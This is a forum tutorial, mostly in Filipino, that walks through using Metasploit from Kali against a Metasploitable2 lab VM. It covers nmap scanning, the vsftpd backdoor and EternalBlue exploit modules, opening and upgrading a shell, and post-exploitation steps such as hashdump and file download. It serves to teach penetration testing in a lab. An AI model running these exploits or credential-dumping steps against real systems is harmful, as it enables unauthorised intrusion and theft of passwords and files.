👨‍🏫 Tutorial Metasploit Framework (Exploitation Tools) step-by-step tutorial legal lab setup (VM to VM)

NinjaWangya

Grasshopper
⚠️
Gamitin lang ito sa:

  • Sarili mong VM
  • Lab environment (Kali + Metasploitable)
👉 Huwag sa real targets (îllégâl yan)


🧱

1. Install Target VM (Metasploitable2)​

  • Download: Metasploitable2
  • Import sa VMware
  • Start mo

2. Check IP Address ng Target​

Sa Metasploitable terminal:

ifconfig<br>
Example output:

192.168.1.10<br>

3. Check Kali Linux IP​

ip a<br>
Example:

192.168.1.5<br>
👉 Dapat same network sila


🔍

Use Nmap​

nmap -A 192.168.1.10<br>
Makikita mo:

  • Open ports
  • Services (FTP, SMB, HTTP)
  • OS
Example:

21/tcp open ftp<br>445/tcp open smb<br>
👉 Ito ang hahanapan natin ng exploit


💣

sudo msfconsole<br>
Hintayin mag load.


🔎

Example: SMB vulnerability

search smb<br>
or specific:

search type:exploit smb<br>

⚔️

Example:

use exploit/unix/ftp/vsftpd_234_backdoor<br>

⚙️

show options<br>
Makikita mo:

  • RHOSTS (target IP)
  • RPORT

🎯

set RHOSTS 192.168.1.10<br>
Optional:

set RPORT 21<br>

🚀

exploit<br>
or:

run<br>

🎉

Kapag successful:

Command shell session opened<br>
Try commands:

whoami<br>ls<br>pwd<br>

🧠

Kung basic shell lang:

sessions<br>
Then:

sessions -i 1<br>
Upgrade:

python -c 'import pty; pty.spawn("/bin/bash")'<br>

💥

Kung meterpreter session:

sysinfo<br>
getuid<br>
screenshot<br>
hashdump<br>

📂

Examples:

Dump passwords:​

hashdump<br>

Navigate files:​

cd /home<br>ls<br>

Download file:​

download file.txt<br>

🧪

use exploit/windows/smb/ms17_010_eternalblue<br>set RHOSTS 192.168.1.10<br>set LHOST 192.168.1.5<br>exploit<br>

📌

help<br>search<br>use<br>set<br>show options<br>exploit<br>sessions<br>background<br>

🧭

  1. Scan → nmap
  2. Find vulnerability
  3. Search exploit → search
  4. Configure → set
  5. Execute → exploit
  6. Access system → shell/meterpreter
  7. Post exploitation

💡

  • Always use:
set LHOST &lt;your IP&gt;<br>
  • Use:
show payloads<br>
para pumili ng payload

  • Use:
info<br>
para maintindihan exploit


 

About this Thread

  • 1
    Replies
  • 437
    Views
  • 2
    Participants
Last reply from:
Tatalouie

Online now

Members online
431
Guests online
1,656
Total visitors
2,087

Forum statistics

Threads
2,268,231
Posts
28,920,998
Members
1,243,870
Latest member
Daddysharky949
Back
Top